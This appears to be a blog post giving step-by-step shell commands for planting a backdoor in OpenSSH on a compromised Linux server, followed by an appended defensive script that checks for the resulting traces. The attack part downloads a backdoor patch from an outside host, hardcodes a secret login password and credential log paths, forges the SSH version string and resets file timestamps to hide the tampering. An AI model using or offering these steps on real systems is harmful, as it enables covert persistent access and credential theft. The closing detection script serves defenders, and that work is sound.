
Linux penetration: the OpenSSH backdoor

2015-08-10 - Linux penetration, Linux operations security, penetration testing

First obtain shell access on the server, then escalate to root by whatever means are available!

Getting root is only the beginning:

1. First check the SSH version:

~# ssh -V
OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013


2. Download the SSH source package

~# wget http://www.k2a.cn/Tools/open.tar.gz                   (source package)

~# wget http://www.k2a.cn/Tools/patch.tar.gz                 (backdoor files)

3. Back up the existing SSH configuration file

~# cp -p /etc/ssh/sshd_config{,.bak}

4. Compile and install

~# tar -xzvf open.tar.gz

~# tar -zxvf patch.tar.gz

~# cd openssh-5.9p1.patch/

/openssh-5.9p1.patch# cp sshbd5.9p1.diff ../openssh-5.9p1

/openssh-5.9p1.patch# cd ../openssh-5.9p1

/openssh-5.9p1# patch < sshbd5.9p1.diff
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h

5. Set the backdoor password (warden here); the log paths can be anything
/openssh-5.9p1# vim includes.h
#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "warden"

6. Change the SSH version string

/openssh-5.9p1# vim version.h
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE

7. Compile and install

/openssh-5.9p1# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5

/openssh-5.9p1# make && make install

/etc/ssh# touch -r sshd_config.bak ssh_config

/etc/ssh# service sshd reload

8. Common problems

The following packages may need to be installed:

openssl openssl-devel pam pam-devel zlib-devel
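
Seen from the defender's side, the procedure above leaves two checkable traces: the log paths compiled into the binary in step 5, and a version string (step 6) that no longer matches the package database. The shell sketch below is an added example, not part of the original post; its function names and the sample package version string are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: triage for the sshd tampering
# described above. Function names are assumptions made for this sketch.

# Paths from the page's includes.h edit. They are attacker-chosen, so a clean
# scan does not clear a binary; a hit is a strong indicator.
MARKERS='/tmp/ilog /tmp/olog'

# Print every marker embedded in file $1; return 0 if at least one is present.
scan_markers() {
    hit=1
    for m in $MARKERS; do
        if grep -a -q -F -- "$m" "$1"; then
            echo "$m"
            hit=0
        fi
    done
    return "$hit"
}

# "OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL ..." -> "6.0p1"
banner_version() {
    printf '%s\n' "$1" | sed -n 's/^OpenSSH_\([^ ,]*\).*/\1/p'
}

# Debian package version "1:6.0p1-4+deb7u2" -> upstream part "6.0p1"
pkg_upstream_version() {
    printf '%s\n' "$1" | sed -e 's/^[0-9]*://' -e 's/-[^-]*$//'
}

# Return 0 (suspicious) when the binary's banner disagrees with the package DB.
version_mismatch() {
    [ "$(banner_version "$1")" != "$(pkg_upstream_version "$2")" ]
}

# Live use on a Debian host:
#   version_mismatch "$(ssh -V 2>&1)" \
#       "$(dpkg-query -W -f='${Version}' openssh-client)" && echo MISMATCH
#   scan_markers /usr/sbin/sshd

# Constructed sample: a stand-in file carrying one of the page's log paths,
# and the banner that the version.h edit in step 6 would produce.
sample=$(mktemp)
printf 'ELF\0junk\0/tmp/ilog\0more' > "$sample"
scan_markers "$sample" >/dev/null && echo "sample: marker found"
version_mismatch 'OpenSSH_5.3p1p1' '1:6.0p1-4+deb7u2' && echo "sample: version mismatch"
rm -f "$sample"
```

Because the marker paths can be changed at build time, pair these checks with the package manager's file verification (for example rpm -V openssh-server, or debsums on Debian) run from trusted media.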
